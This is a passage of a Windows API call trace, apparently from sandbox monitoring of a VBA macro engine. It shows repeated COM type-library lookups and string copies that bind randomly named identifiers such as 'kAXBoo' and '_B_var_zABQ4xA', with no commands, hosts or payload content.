[0068.515] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.515] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3ba2ade | out: _Dst=0x67c2d40) returned 0x0 [0068.515] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FAUkkDwA") returned 0x1094e0 [0068.515] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="hAAx4BXx", cchCount1=-1, lpString2="_B_var_FAUkkDwA", cchCount2=-1) returned 3 [0068.515] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_FAUkkDwA" | out: _Dst="_B_var_FAUkkDwA") returned 0x0 [0068.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_FAUkkDwA") returned 16 [0068.515] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.515] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FAUkkDwA", lHashVal=0x1094e0, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.515] IUnknown:Release (This=0x665ba50) returned 0xb [0068.515] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.515] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FAUkkDwA", lHashVal=0x1094e0, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.515] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.515] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.515] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FAUkkDwA", lHashVal=0x1094e0, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.515] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.515] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.515] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FAUkkDwA", lHashVal=0x1094e0, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.515] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.516] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.516] IUnknown:Release (This=0x665ba50) returned 0xb [0068.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1fca, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_FAUkkDwA") returned 16 [0068.516] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FAUkkDwA", lHashVal=0x1094e0, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x46005f00720061, ppTypeComp=0x6b006b00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x46005f00720061, ppTypeComp=0x6b006b00000000, pDummy=0x0) returned 0x0 [0068.516] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2ade | out: _Dst=0x145020) returned 0x0 [0068.516] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kAXBoo", lHashVal=0x100328, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b5a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="kAXBoo") returned 7 [0068.516] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kAXBoo", lHashVal=0x100328, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b5a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="kAXBoo") returned 7 [0068.516] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kAXBoo", lHashVal=0x100328, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.516] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kAXBoo") returned 0x100328 [0068.516] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="kAXBoo" | out: _Dst="kAXBoo") returned 0x0 [0068.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="kAXBoo") returned 7 [0068.516] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.516] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kAXBoo", lHashVal=0x100328, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.516] IUnknown:Release (This=0x665ba50) returned 0xb [0068.516] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.516] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kAXBoo", lHashVal=0x100328, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.516] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.516] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.516] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kAXBoo", lHashVal=0x100328, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.516] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.517] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.517] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kAXBoo", lHashVal=0x100328, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.517] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b5a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="kAXBoo") returned 7 [0068.517] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kAXBoo", lHashVal=0x100328, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.517] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.517] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2b5a | out: _Dst=0x67c2d40) returned 0x0 [0068.517] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kAXBoo") returned 0x107dd1 [0068.517] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_kAXBoo" | out: _Dst="_B_var_kAXBoo") returned 0x0 [0068.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_kAXBoo") returned 14 [0068.517] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.517] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kAXBoo", lHashVal=0x107dd1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.517] IUnknown:Release (This=0x665ba50) returned 0xb [0068.517] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.517] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kAXBoo", lHashVal=0x107dd1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.517] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.517] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.517] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kAXBoo", lHashVal=0x107dd1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.517] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.517] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.517] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kAXBoo", lHashVal=0x107dd1, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.518] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.518] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.518] IUnknown:Release (This=0x665ba50) returned 0xb [0068.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1ffa, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_kAXBoo") returned 14 [0068.518] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kAXBoo", lHashVal=0x107dd1, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6b005f00720061, ppTypeComp=0x6f004200000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6b005f00720061, ppTypeComp=0x6f004200000000, pDummy=0x0) returned 0x0 [0068.518] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2b5a | out: _Dst=0x145020) returned 0x0 [0068.518] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zABQ4xA", lHashVal=0x1050ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b82, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="zABQ4xA") returned 8 [0068.518] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zABQ4xA", lHashVal=0x1050ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b82, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="zABQ4xA") returned 8 [0068.518] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zABQ4xA", lHashVal=0x1050ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.518] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zABQ4xA") returned 0x1050ea [0068.518] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="zABQ4xA" | out: _Dst="zABQ4xA") returned 0x0 [0068.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="zABQ4xA") returned 8 [0068.519] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.519] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zABQ4xA", lHashVal=0x1050ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.519] IUnknown:Release (This=0x665ba50) returned 0xb [0068.519] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.519] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zABQ4xA", lHashVal=0x1050ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.519] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.519] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.519] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zABQ4xA", lHashVal=0x1050ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.519] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.519] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.519] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zABQ4xA", lHashVal=0x1050ea, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.519] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2b82, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="zABQ4xA") returned 8 [0068.519] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zABQ4xA", lHashVal=0x1050ea, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.519] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.519] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3ba2b82 | out: _Dst=0x67c2d40) returned 0x0 [0068.519] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zABQ4xA") returned 0x1044ed [0068.519] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_zABQ4xA" | out: _Dst="_B_var_zABQ4xA") returned 0x0 [0068.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_zABQ4xA") returned 15 [0068.519] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.519] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zABQ4xA", lHashVal=0x1044ed, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.519] IUnknown:Release (This=0x665ba50) returned 0xb [0068.519] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.519] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zABQ4xA", lHashVal=0x1044ed, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.519] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.520] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.520] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zABQ4xA", lHashVal=0x1044ed, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.520] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.520] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.520] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zABQ4xA", lHashVal=0x1044ed, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.520] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.520] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.520] IUnknown:Release (This=0x665ba50) returned 0xb [0068.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc202a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_zABQ4xA") returned 15 [0068.520] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zABQ4xA", lHashVal=0x1044ed, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x34005100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x34005100000000, pDummy=0x0) returned 0x0 [0068.520] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba2b82 | out: _Dst=0x145020) returned 0x0 [0068.520] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ixkwwA", lHashVal=0x1053da, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2baa, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="ixkwwA") returned 7 [0068.520] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ixkwwA", lHashVal=0x1053da, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2baa, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="ixkwwA") returned 7 [0068.520] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ixkwwA", lHashVal=0x1053da, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.520] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ixkwwA") returned 0x1053da [0068.520] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="ixkwwA" | out: _Dst="ixkwwA") returned 0x0 [0068.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="ixkwwA") returned 7 [0068.520] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.520] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ixkwwA", lHashVal=0x1053da, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.521] IUnknown:Release (This=0x665ba50) returned 0xb [0068.521] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.521] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ixkwwA", lHashVal=0x1053da, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.521] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.521] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.521] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ixkwwA", lHashVal=0x1053da, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.521] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.521] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.521] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ixkwwA", lHashVal=0x1053da, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.521] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2baa, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="ixkwwA") returned 7 [0068.521] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ixkwwA", lHashVal=0x1053da, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.521] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.521] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3ba2baa | out: _Dst=0x67c2d40) returned 0x0 [0068.521] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ixkwwA") returned 0x10ce83 [0068.521] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_ixkwwA" | out: _Dst="_B_var_ixkwwA") returned 0x0 [0068.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_ixkwwA") returned 14 [0068.521] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.521] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ixkwwA", lHashVal=0x10ce83, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.521] IUnknown:Release (This=0x665ba50) returned 0xb [0068.521] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.521] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ixkwwA", lHashVal=0x10ce83, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.521] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.521] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.521] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ixkwwA", lHashVal=0x10ce83, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.521] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.521] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.522] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ixkwwA", lHashVal=0x10ce83, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.522] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.522] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.522] IUnknown:Release (This=0x665ba50) returned 0xb [0068.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc205a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_ixkwwA") returned 14 [0068.522] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ixkwwA", lHashVal=0x10ce83, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x69005f00720061, ppTypeComp=0x77007700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x69005f00720061, ppTypeComp=0x77007700000000, pDummy=0x0) returned 0x0 [0068.522] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2baa | out: _Dst=0x145020) returned 0x0 [0068.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2bd2, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAwZw1") returned 7 [0068.522] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uAwZw1", lHashVal=0x10dc06, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2bd2, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAwZw1") returned 7 [0068.522] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uAwZw1", lHashVal=0x10dc06, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2bd2, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="uAwZw1") returned 7 [0068.522] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uAwZw1", lHashVal=0x10dc06, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.522] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAwZw1") returned 0x10dc06 [0068.522] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="uAwZw1" | out: _Dst="uAwZw1") returned 0x0 [0068.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="uAwZw1") returned 7 [0068.522] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.522] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uAwZw1", lHashVal=0x10dc06, pfName=0x144d20, 